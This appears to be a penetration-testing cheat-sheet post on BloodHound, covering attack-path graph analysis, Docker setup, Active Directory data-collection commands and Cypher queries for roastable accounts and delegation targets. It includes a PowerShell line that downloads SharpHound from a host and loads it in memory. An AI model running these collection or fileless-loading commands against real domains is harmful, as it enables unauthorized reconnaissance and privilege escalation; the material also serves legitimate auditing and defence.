BloodHound
BloodHound is an open-source tool that uses graph theory to visually map and analyze the relationships and permissions between objects (like users, groups, and computers).
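To illustrate the graph idea above, the following added example (not from the original post or the BloodHound project) runs a breadth-first search over a small constructed edge list and counts which relationships sit on the most paths to Domain Admins, which is how a defender would pick the edge to remove first. All principal names are made up; the relationship names follow BloodHound's edge types.

```python
from collections import Counter, deque

# Constructed sample graph: (source, relationship, target). All names are made up.
EDGES = [
    ("ALICE@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
    ("BOB@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "GenericAll", "SVC_BACKUP@CORP.LOCAL"),
    ("SVC_BACKUP@CORP.LOCAL", "AdminTo", "FILE01.CORP.LOCAL"),
    ("FILE01.CORP.LOCAL", "HasSession", "DA_CAROL@CORP.LOCAL"),
    ("DA_CAROL@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
    ("DAVE@CORP.LOCAL", "MemberOf", "PRINTERS@CORP.LOCAL"),
]

def build_graph(edges):
    """Adjacency list: node -> [(relationship, neighbour), ...]."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
    return graph

def shortest_path(graph, start, target):
    """Breadth-first search; returns the hops as (src, rel, dst) or None."""
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            hops = []
            while parent[node] is not None:
                prev, rel = parent[node]
                hops.append((prev, rel, node))
                node = prev
            return hops[::-1]
        for rel, nxt in graph.get(node, []):
            if nxt not in parent:
                parent[nxt] = (node, rel)
                queue.append(nxt)
    return None

def choke_points(edges, starts, target):
    """Count how many starting principals reach the target through each edge."""
    graph = build_graph(edges)
    counts = Counter()
    for start in starts:
        counts.update(shortest_path(graph, start, target) or [])
    return counts

if __name__ == "__main__":
    users = ["ALICE@CORP.LOCAL", "BOB@CORP.LOCAL", "DAVE@CORP.LOCAL"]
    for edge, n in choke_points(EDGES, users, "DOMAIN ADMINS@CORP.LOCAL").most_common():
        print(n, " -> ".join(edge))
```

Edges with the highest count are shared by the most paths, so removing one of them (here the HELPDESK GenericAll right) cuts every path that runs through it.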
Installation Guide
# Create the BloodHound directory and work inside it
sudo mkdir -p /opt/bloodhound
sudo chown "$USER" /opt/bloodhound
cd /opt/bloodhound
# Install Docker and Docker Compose
sudo apt install docker.io && sudo apt install docker-compose
# Add the user to the docker group to run containers without sudo
# (takes effect at next login; docker group membership is root-equivalent on this host)
sudo usermod -aG docker "$USER"
# Download the BloodHound compose file
curl -L https://ghst.ly/getbhce > docker-compose.yml
# Pull the images and start the BloodHound containers
sudo docker-compose pull && sudo docker-compose up
# Open the web interface
http://localhost:8080/
# Grab the initial password from the log output on screen
# Login credentials
admin:<Initial_Passwords>
BloodHound Loot Collection
NetExec ldap $TARGET -u "$user" -p "$pass" --bloodhound --collection All --dns-server $TARGET -d $Domain
bloodhound-python -d $Domain -u "$user" -p "$pass" -ns $IP -dc $Full_Domain -c All --zip
bloodyAD --host $TARGET -d $Domain -u "$user" -p "$pass" get bloodhound --transitive --path .
rusthound --domain $Domain -u "$user" -p "$pass" --zip
.\sharpHound.exe -s -c all,gpolocalgroup
# Execute SharpHound in memory
$data = (New-Object System.Net.WebClient).DownloadData('http://$TARGET:$PORT/SharpHound.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Sharphound.Program]::Main("--collectionmethods All --domain $Domain_Name --searchforest true --outputdirectory c:\users\public\ --zipfilename Bloodhound.zip".Split())
Custom Queries
List all Users
Match (n:User) RETURN n
List all computers
MATCH (n:Computer) RETURN n
List all Kerberoastable Users
MATCH (n:User) WHERE n.hasspn = true
RETURN n

MATCH (n:User {hasspn: true}) WHERE NOT n.name STARTS WITH 'KRBTGT'
RETURN n
List all AS-REP Roastable Users
MATCH (n:User) WHERE n.dontreqpreauth = true
RETURN n

MATCH (n:User {dontreqpreauth: true, enabled: true})
RETURN n
Delegation Attacks
Unconstrained Delegation
// By Computer
MATCH (n:Computer {unconstraineddelegation: true})
RETURN n
// By Users
MATCH (n:User {unconstraineddelegation: true})
RETURN n
Constrained Delegation
// allowedtodelegate holds the list of target SPNs, so test for its presence
MATCH (n) WHERE n.allowedtodelegate IS NOT NULL
RETURN n
Resource-Based Constrained Delegation
MATCH (n:Computer) WHERE EXISTS(n.allowedtoact)
RETURN n
This post is licensed under CC BY 4.0 by the author.
